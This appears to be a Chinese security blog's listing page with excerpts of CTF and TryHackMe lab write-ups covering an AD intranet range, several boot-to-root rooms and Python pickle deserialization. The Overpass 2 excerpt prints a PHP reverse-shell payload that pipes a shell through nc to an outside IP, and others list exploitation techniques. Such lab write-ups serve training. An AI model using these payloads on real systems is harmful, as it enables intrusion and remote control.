2022网鼎杯决赛内网靶场复现
2022网鼎杯决赛内网靶场复现工具 目录扫描工具[[dirsreach]],[[gobuster]] , antsword,godzilla,[[fscan]],[[WPScan]],[[chisel]],[[frp]],[[Proxifier]] , [[msf]],[[WMIexec]],rdp是什么,[[CrackMapExec]] 复现 靶标介绍:该靶场为 2022 第三届网鼎杯决赛内网靶场复盘。完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有 4 个 flag,分布于不同的靶机。 考点: wordpress插件rce MS17-010 AS-REP Roasting 基于资源的约束性委派 智能卡身份验证出错下的CVE-2022–26923 AD域提权打法——Schannel传递证书传递到LDAPS,修改LDAP配置RBCD 渗透的过程 外网打点 ->...
THM - Offensive Pentesting - Section2 - Relevant
THM - Offensive Pentesting - Section2 - Relevant 您已被指派给一位客户,该客户希望对七天内将要发布到生产环境中进行渗透测试。 工作范围 客户要求工程师对提供的虚拟环境进行评估。客户要求提供关于评估的最低限度的信息,希望从恶意行为者的角度进行评估(黑盒渗透测试)。客户要求您获取两个 flag(未提供位置)作为漏洞利用的证据: 用户.txt 根.txt 此外,客户还提供了以下范围许可: 本次活动允许使用任何工具或技术,但我们要求您首先尝试手动利用 找到并记录发现的所有漏洞 将发现的标志提交到仪表板 只有分配给您的机器的 IP 地址在范围内 查找并报告所有漏洞(是的,根路径不止一条) (角色扮演关闭) 我鼓励你把这次挑战当成一次真正的渗透测试来对待。你可以考虑写一份报告,其中包含执行摘要、漏洞和利用评估以及补救建议,这将有助于你准备 eLearnSecurity 认证专业渗透测试员,或成为一名渗透测试员。注意 - 此房间内的任何内容都不需要Metasploit 机器可能需要最多 5...
THM - Offensive Pentesting - Section2 - Overpass 2 - Hacked
THM - Offensive Pentesting - Section2 - Overpass 2 - Hacked Overpass 被黑了!SOC团队(Paradox,恭喜升级)在深夜值班时查看 shibes 时发现了可疑活动,并成功捕获了攻击发生时的数据包。 您能弄清楚攻击者是如何入侵的,并重新入侵 Overpass 的生产服务器吗? 他们用来上传反向 shell 的页面 URL 是什么?流量包中可以看到是development payload 1<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?> 密码在tcp流3中 发现使用了ssh-backdoor 1git clone...
THM - Offensive Pentesting - Section2 - Skynet
THM - Offensive Pentesting - Section2 - Skynet 外网打点nmap扫描报告12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849nmap -sV -sC -p- --min-rate 10000 10.10.220.42Starting Nmap 7.80 ( https://nmap.org ) at 2025-04-14 03:50 EDTWarning: 10.10.220.42 giving up on port because retransmission cap hit (10).Nmap scan report for 10.10.220.42Host is up (0.23s latency).Not shown: 51285 closed ports, 14244 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh ...
THM - Offensive Pentesting - Section - Kenobi
THM - Offensive Pentesting - Section - Kenobi此房间将涵盖访问 Samba 共享、纵易受攻击的 proftpd 版本以获得初始访问权限,并通过 SUID 二进制文件将您的权限升级到 root。有关利用 Linux 计算机的演练。枚举 Samba 的共享,作易受攻击的 proftpd 版本,并通过路径变量作提升您的权限。 nmap 扫描 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475nmap -sV -sC -p- --min-rate 10000 10.10.166.21Starting Nmap 7.80 ( https://nmap.org ) at 2025-04-07 09:40 EDTNmap scan report for 10.10.166.21Host is up (0.24s...
Python反序列化漏洞分析
Python反序列化漏洞分析前置知识 Python 对象序列化Python中序列化一般有三种方式: pickle模块和json模块, 还有一个更原始的序列化模块marshal。pickle模块是Python特有的格式, json模块是json通用的格式。marshal存在主要是为了支持 Python 的 .pyc 文件。一般地 pickle 应该是序列化 Python 对象时的首选。 官方文档的解释:pickle — Python 对象序列化 — Python 3.12.5 文档 python中可以被序列化和反序列化的对象下列类型可以被封存: 内置常量 (None, True, False, Ellipsis 和 NotImplemented); 整数、浮点数、复数; 字符串、字节串、字节数组; 只包含可封存对象的元组、列表、集合和字典; 可在模块最高层级上访问的(内置与用户自定义的)函数(使用 def,而不是使用 lambda 定义); 可在模块最高层级上访问的类; 这种类的实例调用 \_\_getstate\_\_() 的结果是可 pickle...
